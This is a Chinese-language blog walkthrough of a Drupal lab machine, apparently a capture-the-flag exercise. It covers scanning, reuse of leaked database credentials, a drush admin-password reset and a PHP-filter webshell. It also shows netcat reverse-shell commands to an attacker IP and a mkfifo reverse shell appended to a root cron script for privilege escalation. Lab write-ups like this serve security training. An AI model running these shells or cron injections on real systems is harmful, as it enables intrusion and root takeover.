❤️博客主页: iknow181
🔥系列专栏: 网络安全、 Python、JavaSE、JavaWeb、CCNP
🎉欢迎大家点赞👍收藏⭐评论✍
一、收集信息
1.查看主机是否存活
nmap -T4 -sP 192.168.216.149
2.主动扫描
看开放了哪些端口和功能
nmap -A -p- 192.168.216.149
发现
22-ssh
80-http
3.whatweb扫描
发现有网站,进一步确认
4.搜索作者
发现下面有作者
去github上搜索一下,有没有相关内容
点击users,看
找到一个config.php文件,这是一个连接数据库的配置文件,里面有用户名和密码,可能和他的vps或者服务器的用户名密码匹配的
二、入侵目标主机
1.尝试进行ssh登录
2.查看文件
发现执行了/opt/scripts/backups.sh文件,生成了那些.gz的文件
3.进入文件夹
发现是一个备份数据库的sh文件,有可能是定时任务执行
4.利用drush
因为是drupal,所有有个drush命令
drush可以修改管理员用户
进入网站的根目录,修改管理员密码为123456(注意命令不要有空格)
5.进入网站后台
可以看到有个login
可以进入192.168.216.149/user/login,登录admin
进入content,编辑文章
最好能写入php代码
6.安装php插件
整一个drupal的php插件
加载安装包
安装成功
勾选php filter,并且激活
回到content发现有phpcode
7.生成木马文件写入
将其复制到content中
7.连接
8.nc连接
因为这个木马可能不太稳定
kali:nc -lvp 9988
目标:nc -e /bin/bash 192.168.216.161 9988
连接成功
9.美化界面
python -c 'import pty;pty.spawn("/bin/bash")'
三、提权
1.kali监听1234端口
2.将命令写入backups.sh
因为backups.sh是一个计划任务,用的root权限
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.216.161 1234 > /tmp/f" >> backups.sh"
3.等待计划任务执行
4.拿到flag